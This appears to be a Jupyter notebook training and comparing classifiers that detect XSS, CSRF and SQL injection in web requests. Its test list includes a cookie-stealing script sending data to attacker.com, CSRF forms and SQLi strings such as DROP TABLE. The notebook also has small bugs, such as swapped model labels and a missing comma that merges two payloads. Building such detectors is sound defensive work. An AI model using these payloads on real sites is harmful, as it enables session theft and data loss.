Epoch 16/200, Loss: 0.1424
Epoch 17/200, Loss: 0.1297
Epoch 18/200, Loss: 0.1491
Epoch 19/200, Loss: 0.1358
Epoch 20/200, Loss: 0.1347
Epoch 21/200, Loss: 0.1346
Epoch 22/200, Loss: 0.1287
Epoch 23/200, Loss: 0.1317
Epoch 24/200, Loss: 0.1333
Epoch 25/200, Loss: 0.1219
Epoch 26/200, Loss: 0.1250
Epoch 27/200, Loss: 0.1275
Epoch 28/200, Loss: 0.1300
Epoch 29/200, Loss: 0.1171
Epoch 30/200, Loss: 0.1198
Epoch 31/200, Loss: 0.1232
Epoch 32/200, Loss: 0.1205
Epoch 33/200, Loss: 0.1182
Epoch 34/200, Loss: 0.1215
Epoch 35/200, Loss: 0.1204
Epoch 36/200, Loss: 0.1120
Epoch 37/200, Loss: 0.1220
Epoch 38/2

In [32]:
mlp_model.eval() # Set the model to evaluation mode
all_preds = []
all_targets = []

with torch.no_grad(): # No need to calculate gradients during evaluation
    for data, targets in test_loader:
        data = data.to(device)
        targets = targets.to(device)
        
        scores = mlp_model(data)
        # Get predictions by finding the class with the highest score
        _, predictions = torch.max(scores, 1)
        
        all_preds.extend(predictions.cpu().numpy())
        all_targets.extend(targets.cpu().numpy())

print(f"\nStep 6a: Evaluating MLP Classifier model performance...")
accuracy = accuracy_score(all_targets, all_preds)
print(f"\nFinal Test Accuracy: {accuracy*100:.2f}%")

report = classification_report(all_targets, all_preds, digits=2, zero_division=0)
print("Classification Report:")
print(report)


Step 6a: Evaluating MLP Classifier model performance...

Final Test Accuracy: 93.30%
Classification Report:
              precision    recall  f1-score   support

           0       0.99      0.91      0.95     19269
           1       1.00      0.99      0.99      5914
           2       0.41      0.94      0.57      1289
           3       1.00      1.00      1.00      2276

    accuracy                           0.93     28748
   macro avg       0.85      0.96      0.88     28748
weighted avg       0.97      0.93      0.94     28748



In [33]:
print("\n🤖 Training RandomForest Classifier model...")
rf_model = RandomForestClassifier(n_estimators=100, random_state=42, class_weight='balanced')
rf_model.fit(X_train, y_train)
print("\n🤖 RandomForest Classifier model training completed...")


🤖 Training RandomForest Classifier model...

🤖 RandomForest Classifier model training completed...


In [34]:
print("\n📊 Step 6a: Evaluating RandomForest Classifier model performance...")
y_pred = rf_model.predict(X_test)
print(f"Model Accuracy: {accuracy_score(y_test, y_pred):.4f}")
print("\nClassification Report:")
print(classification_report(y_test, y_pred, zero_division=0))


📊 Step 6a: Evaluating RandomForest Classifier model performance...
Model Accuracy: 0.9595

Classification Report:
              precision    recall  f1-score   support

           0       0.95      0.99      0.97     19269
           1       1.00      0.98      0.99      5914
           2       0.81      0.29      0.43      1289
           3       1.00      0.99      0.99      2276

    accuracy                           0.96     28748
   macro avg       0.94      0.81      0.85     28748
weighted avg       0.96      0.96      0.95     28748



In [35]:
print("\n🤖 Training Logistic Regression Classifier model...")
lg_model = LogisticRegression(random_state=42, class_weight='balanced')
lg_model.fit(X_train, y_train)
print("\n🤖 Logistic Regression Classifier model training completed...")


🤖 Training Logistic Regression Classifier model...

🤖 Logistic Regression Classifier model training completed...


In [36]:
print("\n📊 Step 6a: Evaluating Logistic Regression Classifier model performance...")
y_pred = lg_model.predict(X_test)
print(f"Model Accuracy: {accuracy_score(y_test, y_pred):.4f}")
print("\nClassification Report:")
print(classification_report(y_test, y_pred, zero_division=0))


📊 Step 6a: Evaluating Logistic Regression Classifier model performance...
Model Accuracy: 0.6379

Classification Report:
              precision    recall  f1-score   support

           0       0.93      0.51      0.66     19269
           1       0.62      0.89      0.73      5914
           2       0.21      0.76      0.33      1289
           3       0.45      0.99      0.62      2276

    accuracy                           0.64     28748
   macro avg       0.55      0.79      0.58     28748
weighted avg       0.79      0.64      0.66     28748



In [39]:
def classify_request_lg(payload):
    """
    Classifies a single payload by extracting the unified feature vector
    and passing it to the trained model for prediction.
    """
    try:
        xss_rules = extract_xss_68_features(payload)
        csrf_rules = extract_rule_based_csrf_features(payload)
        sqli_rules = extract_sqli_features(payload)
        nlp_features = extract_uniembed_features(payload)

        combined_features = np.hstack([xss_rules, csrf_rules, sqli_rules, nlp_features])
        
        feature_vector = combined_features.reshape(1, -1)
        
        prediction = lg_model.predict(feature_vector)
        probabilities = lg_model.predict_proba(feature_vector)
        confidence = probabilities.max()
        
        return prediction, probabilities, confidence

    except Exception as e:
        # Log the error for debugging purposes.
        print(f"An error occurred during classification: {e}")
        # Return a default "benign" class (0) if prediction fails.
        return 0

def classify_request_rf(payload):
    """
    Classifies a single payload by extracting the unified feature vector
    and passing it to the trained model for prediction.
    """
    try:
        xss_rules = extract_xss_68_features(payload)
        csrf_rules = extract_rule_based_csrf_features(payload)
        sqli_rules = extract_sqli_features(payload)
        nlp_features = extract_uniembed_features(payload)

        combined_features = np.hstack([xss_rules, csrf_rules, sqli_rules, nlp_features])
        
        feature_vector = combined_features.reshape(1, -1)
        
        prediction = rf_model.predict(feature_vector)
        probabilities = rf_model.predict_proba(feature_vector)
        confidence = probabilities.max()
        
        return prediction, probabilities, confidence

    except Exception as e:
        # Log the error for debugging purposes.
        print(f"An error occurred during classification: {e}")
        # Return a default "benign" class (0) if prediction fails.
        return 0

def classify_request_mlp(payload):
    """
    Classifies a single payload using the trained PyTorch MLP model.
    """
    mlp_model.eval()

    try:
        xss_rules = extract_xss_68_features(payload)
        csrf_rules = extract_rule_based_csrf_features(payload)
        sqli_rules = extract_sqli_features(payload)
        nlp_features = extract_uniembed_features(payload)
        combined_features = np.hstack([xss_rules, csrf_rules, sqli_rules, nlp_features])
        
        feature_tensor = torch.tensor(combined_features, dtype=torch.float32)
        feature_tensor = feature_tensor.unsqueeze(0).to(device)

        with torch.no_grad():
            logits = mlp_model(feature_tensor)
            
            # This line requires 'import torch.nn.functional as F'
            probabilities_tensor = F.softmax(logits, dim=1)
            
            confidence_tensor, prediction_tensor = torch.max(probabilities_tensor, 1)

        prediction = prediction_tensor.cpu().item()
        probabilities = probabilities_tensor.cpu().numpy().flatten()
        confidence = confidence_tensor.cpu().item()
        
        return prediction, probabilities, confidence

    except Exception as e:
        print(f"An error occurred during MLP classification: {e}")

In [ ]:
MODEL_FILENAME = "xss_csrf_detector.joblib"
print("\n Loading the saved Model")
model=joblib.load(MODEL_FILENAME)
print("✅ Model loaded back successfully.")

In [40]:
print("\n🔍 Predicting new, unseen payloads with the hybrid model...")
new_payloads = [
    "this is a normal search query",
    "how to login to my account",
    "user_id = 12345",
    # --- Basic & Event-Based Payloads ---
    "<script>alert('XSS')</script>",
    "<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>",
    "<img src=x onerror=alert(1)>",
    "<svg/onload=alert('XSS')>",
    "<body onload=alert(1)>",
    "<video src=x onerror=alert(1)>",
    "<audio src onloadstart=alert(1)>",
    "<details/open/ontoggle=alert(1)>",

    # --- Obfuscated & Filter Bypass Payloads ---
    "<sCrIpT>alert(1)</sCrIpT>",
    "<IMG SRC=x OnErRoR=alert(1)>",
    '<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;1&#41;">',
    "%3Cscript%3Ealert('XSS')%3C/script%3E",
    '<a href="javascript:alert(1)">Click me</a>',
    '<iframe src="javascript:alert(\'XSS\');"></iframe>',
    "<script>eval('al' + 'ert(1)')</script>",
    "this is a normal search query",
    "how to login to my account",
    "user_id = 12345",
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert(1)>",
    "javascript:alert('hello')",
    "'';!--\"<XSS>=&{()}",
    "<scr<script>ipt>alert(1)</scr<script>ipt>"

    '<img src="https://example.com/transfer?to=attacker&amount=1000" width="1" height="1">',
    
    # GET-based CSRF hidden in a link (requires user interaction)
    '<a href="https://example.com/delete_account?user_id=123">Click here for a free prize!</a>',
    
    # POST-based CSRF using an auto-submitting form
    '''<form action="https://example.com/update_profile" method="POST" id="csrf-form">
       <input type="hidden" name="email" value="attacker@evil.com" />
       </form>
       <script>document.getElementById('csrf-form').submit();</script>''',
       
    # Modern CSRF using fetch API (often requires relaxed CORS policy on the target)
    "<script>fetch('https://example.com/post_comment', {method: 'POST', body: 'spam'});</script>",

    # CSRF using a link tag to trigger a GET request
    '<link rel="prefetch" href="https://example.com/logout">',

    "' or 1=1 --",
    "admin' --",
    "UNION SELECT username, password FROM users",
    "1; DROP TABLE users;",
    "SELECT * FROM products WHERE id = '1' AND SLEEP(5)",
    "SELECT * FROM products"
]

for payload in new_payloads:
    # Use the same hybrid function for new data
    
    prediction1, probabilities1, confidence1 = classify_request_lg(payload)
    prediction2, probabilities2, confidence2 = classify_request_rf(payload)
    prediction3, probabilities3, confidence3 = classify_request_mlp(payload)

    print("-" * 30)
    print(f"Payload: '{payload}'")
    print("Prediction by RF model:")
    print(f"  -> Prediction: {prediction1[0]} (Confidence: {confidence1:.2%})")
    print("Prediction by LG model:")
    print(f"  -> Prediction: {prediction2[0]} (Confidence: {confidence2:.2%})")
    print("Prediction by MLP model:")
    print(f"  -> Prediction: {prediction3} (Confidence: {confidence3:.2%})")


🔍 Predicting new, unseen payloads with the hybrid model...
------------------------------
Payload: 'this is a normal search query'
Prediction by RF model:
  -> Prediction: 3 (Confidence: 42.67%)
Prediction by LG model:
  -> Prediction: 0 (Confidence: 93.00%)
Prediction by MLP model:
  -> Prediction: 0 (Confidence: 99.66%)
------------------------------
Payload: 'how to login to my account'
Prediction by RF model:
  -> Prediction: 3 (Confidence: 43.53%)
Prediction by LG model:
  -> Prediction: 0 (Confidence: 94.00%)
Prediction by MLP model:
  -> Prediction: 0 (Confidence: 100.00%)
------------------------------
Payload: 'user_id = 12345'
Prediction by RF model:
  -> Prediction: 3 (Confidence: 39.29%)
Prediction by LG model:
  -> Prediction: 0 (Confidence: 61.00%)
Prediction by MLP model:
  -> Prediction: 0 (Confidence: 99.97%)
------------------------------
Payload: '<script>alert('XSS')</script>'
Prediction by RF model:
  -> Prediction: 0 (Confidence: 48.10%)
Prediction by LG model:
 

In [41]:
MODEL_FILENAME = "rf_xss_csrf_sqli_detector.joblib"
print(f"\n💾 Saving RF model to {MODEL_FILENAME}...")
joblib.dump(rf_model, MODEL_FILENAME)
MODEL_FILENAME = "lg_xss_csrf_sqli_detector.joblib"
print(f"\n💾 Saving LG model to {MODEL_FILENAME}...")
joblib.dump(lg_model, MODEL_FILENAME)
MODEL_FILENAME = "mlp_xss_csrf_sqli_detector.joblib"
print(f"\n💾 Saving MLP model to {MODEL_FILENAME}...")
torch.save(mlp_model.state_dict(), MODEL_FILENAME)
print("✅ All Models saved successfully.")


💾 Saving RF model to rf_xss_csrf_sqli_detector.joblib...

💾 Saving LG model to lg_xss_csrf_sqli_detector.joblib...

💾 Saving MLP model to mlp_xss_csrf_sqli_detector.joblib...
✅ All Models saved successfully.
